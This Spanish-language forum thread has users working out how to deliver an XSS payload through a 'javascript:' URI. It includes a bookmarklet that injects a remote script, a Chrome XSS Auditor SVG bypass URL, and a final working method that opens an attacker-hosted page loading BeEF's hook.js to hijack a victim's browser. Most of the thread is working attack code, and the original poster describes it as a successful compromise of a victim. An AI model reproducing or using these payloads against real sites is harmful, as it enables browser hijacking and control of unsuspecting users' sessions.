Cómo incluir un script de otra página utilizando "javascript:"?

Iniciado por Ethicalsk, 12 Octubre 2017, 14:53 PM

0 Miembros y 1 Visitante están viendo este tema.

Ethicalsk

Buenas! la forma que conozco para agregar un script de otra página es:

Código (javascript) [Seleccionar]
<script src="www.web.com/script.js"></script>

pero si me encuentro realizando un XSS y necesito usar si o si "javascript:" y no al tag <script>, no sabría como incluir un js de otra pagina...

probé:

Código (javascript) [Seleccionar]
javascript:www.web.com/script.js

y no funciono,
tampoco funcionó:

Código (javascript) [Seleccionar]
javascript:src="www.web.com/script.js"

tampoco funcionó:

Código (javascript) [Seleccionar]
javascript:var script = document.createElement('script'); script.src = 'www.web.com/script.js'; document.head.appendChild(script);

Quería saber si tenían algún otra idea. Gracias desde ya!

engel lex

Código (javascript) [Seleccionar]
javascript:
var src="http://loquesea.com/script.js";
var element1 = document.createElement("script");
element1.src = src;
element1.type="text/javascript";
document.getElementsByTagName("head")[0].appendChild(element1);


Lo puse por línea para que sea legible, simplemente copia eso como marcador y cambia el src por el de tu gusto
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

Ethicalsk

#2
Hola engel! Muchas gracias, es bastante parecido a lo que hice en mi tercer intento, pero no me está funcionando. Siendo más específico, lo que estaba queriendo hacer es incluir el hook.js de beEF utilizando éste bypass para los filtros de las versiones más nuevas de Chrome:

https://brutelogic.com.br/blog/chrome-xss-auditor-svg-bypass/

Que sería el siguiente:

https://brutelogic.com.br/xss.php?a=guest!+Watch+the+video+before+proceeding:%3Cbr%3E%3Cbr%3E%3Csvg+width=12cm+height=9cm%3E%3Ca%3E%3Cimage+href=//brutelogic.com.br/yt.jpg+/%3E%3Canimate+attributeName=href+values=javas%26%2399ript:alert(1)%3E

entonces yo pense que al final en vez de usar javascript:alert(1), podría incluir algo como lo que me mandaste vos, pero cuando pruebo en la consola del chrome no logro secuestrar mi navegador. Mira:



según lo que me responde la consola, el script parece haberse formado correctamente, pero sin embargo no logro secuestrar el navegador, sino en Online Browsers dentro del beEF ya tendría que ver la IP del navegador...

Tenés algúna idea sobre como resolver ésto? Saludos!

engel lex

el script está incluido... no tienes que cargar alguna funciòn o algo? no depende de otro? revisaste las peticiones a ver si no están fallando?
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

Ethicalsk

#4
Cuando el hook.js se llega a cargar en el navegador de la víctima ya se secuestra el navegador, no hace falta nada más. Recién estuve fijándome lo que me decías de revisar las solicitudes, y ahí está el tema... Desde la consola del navegador no se envía ninguna consulta... Y la consola solo la estaba usando para probar, pero voy a ver que consulta se hace cuando mando directamente el enlace junto con esas lineas de codigo. Cuando lo pueda resolver escribo por aca. Saludos!


Actualizo!

Ya pude resolver el problema, en éste caso intente algo distinto. Utilicé:

javascript:open(//mi_dns/beef.html/)

y adentro de beef.html tengo:

<html>
<head>
<script src="http://mi_dns:3000/hook.js"></script>
</head>
<body>
</body>
</html>


con ésto pude secuestrar satisfactoriamente el navegador de la víctima a través de beEF bypasseando los ultimos filtros de chrome. Después me gustaría hacer un video explicando cómo lograr ésto y que hay que tener en cuenta para lograrlo.

Saludos!